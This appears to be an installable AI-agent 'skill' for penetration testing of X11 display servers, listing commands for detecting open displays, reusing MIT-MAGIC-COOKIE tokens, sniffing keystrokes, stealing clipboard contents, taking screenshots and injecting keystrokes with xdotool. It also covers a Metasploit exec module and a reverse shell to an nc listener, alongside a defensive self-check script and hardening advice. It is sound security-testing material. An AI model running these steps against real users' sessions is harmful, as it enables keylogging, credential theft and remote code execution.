pentesting-x11


Testing the X Window System (X11) display server during authorized engagements. X11 listens on TCP 6000+<display> and the local Unix socket /tmp/.X11-unix/X<display>. Covers detecting unauthenticated ("xhost +") access with nmap NSE and Metasploit, abusing MIT-MAGIC-COOKIE-1 auth tokens from ~/.Xauthority, window/clipboard enumeration, keystroke sniffing (xspy), screenshotting (xwd), live shadowing, and keystroke injection (xdotool) for command execution.

By xalgord, updated 6/6/2026

---
name: pentesting-x11
description: Testing the X Window System (X11) display server during authorized engagements. X11 listens on TCP 6000+<display> and the local Unix socket /tmp/.X11-unix/X<display>. Covers detecting unauthenticated ("xhost +") access with nmap NSE and Metasploit, abusing MIT-MAGIC-COOKIE-1 auth tokens from ~/.Xauthority, window/clipboard enumeration, keystroke sniffing (xspy), screenshotting (xwd), live shadowing, and keystroke injection (xdotool) for command execution.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  - penetration-testing
  - network-services
  - x11
  - linux
  - keylogging
  - remote-desktop
version: '1.0'
author: xalgorix
license: Apache-2.0
---

Pentesting X11 (port 6000)

When to Use

  • During authorized assessments when TCP 6000+<display> is open (X11 display server)
  • When testing for unauthenticated X11 access (xhost + style misconfiguration)
  • When you have a local foothold and can read a valid ~/.Xauthority cookie
  • When you want screenshots, clipboard contents, keystroke capture, or input injection from an X session
  • When pivoting from a captured display to command execution on the host

Quick Enumeration

```bash
# Check for anonymous (open) X11 access
nmap -sV --script x11-access -p 6000 <IP>
msf> use auxiliary/scanner/x11/open_x11

# Local triage (post-foothold) — find DISPLAY and cookie
echo "$DISPLAY"
ls -lah /tmp/.X11-unix/
ps -efww | grep -E '[X]org|[X]wayland'      # look for -auth <file> in cmdline
xauth info
xauth list

# Shodan-style discovery
# port:6000 x11
```

Critical: Checks Most Often Missed

  1. Open X11 (no auth): xhost + or open access control lets any host connect to display :0 with no token. Confirm with x11-access / open_x11, then enumerate windows directly.
  2. MIT-MAGIC-COOKIE-1 reuse — the 128-bit cookie in ~/.Xauthority is sent in plaintext and grants full access. If you can read the file (or another user's), export XAUTHORITY=/path/to/.Xauthority and connect.
  3. Cookie via Xorg -auth argument — the X server's command line often reveals the authoritative auth file path (ps -efww | grep Xorg), readable with sufficient privileges.
  4. Access ≠ "just graphics" — a connected display enables window enumeration, clipboard theft, screenshots, keystroke sniffing, and input injection (effectively RCE in the user's session).
  5. Unix socket foothold — even when 6000/tcp is closed, a local foothold + valid cookie abuses /tmp/.X11-unix/X<display>.
  6. XSendEvent ignored — apps often drop injected events sent to a specific window; activate the window first, then inject normal key events for reliability.

How to CONFIRM: open access is confirmed when xdpyinfo -display <IP>:0 or xwininfo -root -tree -display <IP>:0 returns display/window data without an auth error. With a cookie, confirm by setting XAUTHORITY and running the same command successfully.
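The same six checks, seen from the hardening side: an added self-check script (not part of the original skill) that maps a DISPLAY value to its TCP port and socket, then tests for a TCP listener, disabled xhost access control, a missing -nolisten tcp, and an over-permissive cookie file. It assumes GNU coreutils (stat -c %a) and either ss or netstat for the live run; the sample command lines in the comments are constructed.

```sh
#!/bin/sh
# X11 exposure self-check (added example; not part of the original skill).
# Each check takes its input as text so it can run on live command output or
# on captured samples; a zero exit status from a check means "finding present".
# Assumes GNU coreutils (stat -c) and either ss or netstat for the live run.

# Display number from a DISPLAY value (":0" -> 0, "host:1.0" -> 1).
display_number() { printf '%s' "$1" | sed -nE 's/^[^:]*:([0-9]+)(\.[0-9]+)?$/\1/p'; }
# TCP port and Unix socket the server uses for that display.
display_to_port()   { n=$(display_number "$1"); [ -n "$n" ] && echo $((6000 + $n)); }
display_to_socket() { n=$(display_number "$1"); [ -n "$n" ] && echo "/tmp/.X11-unix/X$n"; }

# X server reachable over TCP. Input: output of `ss -ltn` or `netstat -ltn`.
tcp_listener_open() { printf '%s\n' "$1" | grep -Eq ':60[0-9][0-9][[:space:]]'; }

# Host-based access control disabled (xhost +). Input: output of `xhost`.
xhost_disabled() { printf '%s\n' "$1" | grep -q '^access control disabled'; }

# Xorg started without -nolisten tcp. Input: the Xorg command line from ps.
# Recent Xorg releases default to no TCP listener, so treat this as corroboration
# for tcp_listener_open rather than as a finding on its own.
xorg_missing_nolisten() { ! printf '%s\n' "$1" | grep -Eq -- '-nolisten[[:space:]]+tcp'; }

# Auth file the server trusts (-auth <file>), empty if none was given.
xorg_auth_file() { printf '%s\n' "$1" | sed -nE 's/.*-auth[[:space:]]+([^[:space:]]+).*/\1/p'; }

# Cookie file readable or writable by group/others. Input: octal mode (stat -c %a).
authfile_too_open() { case "$1" in *00) return 1 ;; *) return 0 ;; esac; }

# Run every check against this host and print findings.
audit_live() {
  disp=${DISPLAY:-:0}
  echo "display $disp -> tcp $(display_to_port "$disp"), socket $(display_to_socket "$disp")"
  tcp_listener_open "$(ss -ltn 2>/dev/null || netstat -ltn 2>/dev/null)" \
    && echo "FINDING: X server listening on TCP 6000-6099"
  xhost_disabled "$(xhost 2>/dev/null)" && echo "FINDING: xhost access control disabled"
  xorg_cmd=$(ps -eo args 2>/dev/null | grep -E '(^|/)X(org|wayland)?[[:space:]]' | head -n 1)
  auth=""
  if [ -n "$xorg_cmd" ]; then
    xorg_missing_nolisten "$xorg_cmd" && echo "NOTE: Xorg started without -nolisten tcp"
    auth=$(xorg_auth_file "$xorg_cmd")
  fi
  for f in "$auth" "${XAUTHORITY:-$HOME/.Xauthority}"; do
    [ -n "$f" ] && [ -f "$f" ] || continue
    mode=$(stat -c %a "$f" 2>/dev/null)
    authfile_too_open "$mode" && echo "FINDING: $f mode $mode is readable by other users"
  done
}
[ "${1:-}" = "--live" ] && audit_live
```

Run it as `sh x11-check.sh --live` on the host being hardened; because each check also accepts captured text, findings can be reproduced later from saved ss, xhost and ps output.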

Workflow

Step 1: Enumerate (detect, find display + cookie)

```bash
# Remote anonymous check
nmap -sV --script x11-access -p 6000 <IP>

# Local: identify the active display and session
w                                            # shows DISPLAY (e.g. :0) and WHAT
echo "$DISPLAY"; ls -lah /tmp/.X11-unix/
xauth list                                   # cookies known to this user

# Use a cookie you obtained
export XAUTHORITY=/path/to/.Xauthority
```

Step 2: Authenticate / connect and inspect the display

```bash
# Display + screen info confirms access
xdpyinfo -display <IP>:<display>
xwininfo -root -tree -display <IP>:<display>     # window tree + IDs

# Follow-up enumeration
xlsclients -display <IP>:<display>
xprop -root _NET_ACTIVE_WINDOW -display <IP>:<display>
xinput --list --display <IP>:<display>
```

Step 3: Exploit / Extract (sniff, clipboard, screenshot)

```bash
# Keystroke sniffing
xspy <IP>:<display>
xinput --test-xi2 --display <IP>:<display>       # monitor input events

# Clipboard theft (credentials, tokens, SSH keys, password-manager pastes)
xclip -display <IP>:<display> -selection clipboard -o
xsel  --display <IP>:<display> --clipboard --output

# Screenshot the root window
xwd -root -screen -silent -display <IP>:0 > screenshot.xwd
convert screenshot.xwd screenshot.png

# Live shadowing of a window / display
xwininfo -root -display <IP>:0                   # get window ID (e.g. 0x45)
./xwatchwin <IP>:0 -w 0x45                       # live view
xpra shadow :0                                   # maintained alternative
```

Step 4: Post-access / command execution

```bash
# Keystroke injection -> run commands in the user's session
WID=$(xdotool search --onlyvisible --name '.*' | head -n 1)
xdotool windowactivate --sync "$WID"
xdotool type --delay 50 'xterm &'
xdotool key Return
# (activating the window first beats XSendEvent filtering)

# Metasploit keyboard-exec module
msf> use exploit/unix/x11/x11_keyboard_exec

# xrdp.py command exec / reverse shell over X11
./xrdp.py <IP>:0
./xrdp.py <IP>:0 --no-disp                        # then use R-Shell to a nc listener
nc -lvp 5555
```

Key Concepts

| Concept | Description |
|---------|-------------|
| X11 / X Window System | Network-capable windowing system for UNIX-like OSes |
| Display number | Maps to TCP 6000 + <display> and the Unix socket /tmp/.X11-unix/X<display> |
| MIT-MAGIC-COOKIE-1 | 128-bit shared secret in ~/.Xauthority, sent in plaintext to authorize clients |
| XAUTHORITY | Env var pointing to the auth cookie file |
| xhost access control | Host-based ACL; xhost + disables it (open access) |
| Input injection | Sending synthetic key/mouse events (xdotool) to the session |
| XSendEvent filtering | Apps ignore synthetic events targeted at a window; activate-then-type instead |
| Shadowing | Live viewing/control of a display via xwatchwin / xpra |

Tools & Systems

| Tool | Purpose |
|------|---------|
| nmap (x11-access) | Detect unauthenticated X11 access |
| Metasploit open_x11 / x11_keyboard_exec | Detect open displays and inject commands |
| xauth | Inspect/manage MIT-MAGIC-COOKIE auth tokens |
| xdpyinfo / xwininfo / xlsclients / xinput | Display, window, client, and input enumeration |
| xspy | Keystroke sniffing on a connected display |
| xclip / xsel | Read clipboard/primary selection contents |
| xwd + convert | Capture and convert screenshots |
| xwatchwin / xpra | Live window/display shadowing |
| xdotool | Keystroke/mouse injection for command execution |

Common Scenarios

Scenario 1: Open Display Screenshot

nmap --script x11-access flags display :0 as open. xwd -root -display <IP>:0 captures the desktop, exposing an open terminal and a password manager window.

Scenario 2: Cookie Reuse

A readable ~/.Xauthority is pulled from a foothold. Setting XAUTHORITY and running xdpyinfo confirms access; xspy then captures the user typing a sudo password.

Scenario 3: Clipboard Secret Theft

Connected to a display, xclip -selection clipboard -o returns a freshly copied SSH private key, reused to authenticate to other hosts.

Scenario 4: Input Injection to RCE

With access to display :0, xdotool activates a visible window and types commands to spawn a reverse shell, turning display access into code execution in the user's session.

Output Format

```markdown
## X11 Finding

**Service**: X Window System (X11)
**Severity**: <Critical|High|Medium>
**Host**: <IP>:6000 (display :<n>)
**Access**: <open/no-auth | cookie-reuse>

### Summary
<What was found: open display, reusable cookie, keystroke capture, clipboard theft, RCE via injection>

### Evidence
- Command: <nmap / xdpyinfo / xspy / xclip / xdotool>
- Output: <display info, sniffed keystrokes (redacted), screenshot path>

### Impact Demonstrated
| Capability | Result |
|------------|--------|
| Screenshot | desktop captured |
| Keylogging | credentials observed |
| Input injection | command executed in user session |

### Recommendation
1. Never disable X11 access control (`xhost +`); use cookie-based auth only
2. Tunnel X11 over SSH (X11 forwarding) instead of exposing TCP 6000
3. Disable the X server TCP listener (`-nolisten tcp`) where not required
4. Protect ~/.Xauthority files and restrict the Xorg -auth file permissions
5. Firewall ports 6000-6010 from untrusted networks
```
Install via CLI
npx skills add https://github.com/xalgord/xalgorix --skill pentesting-x11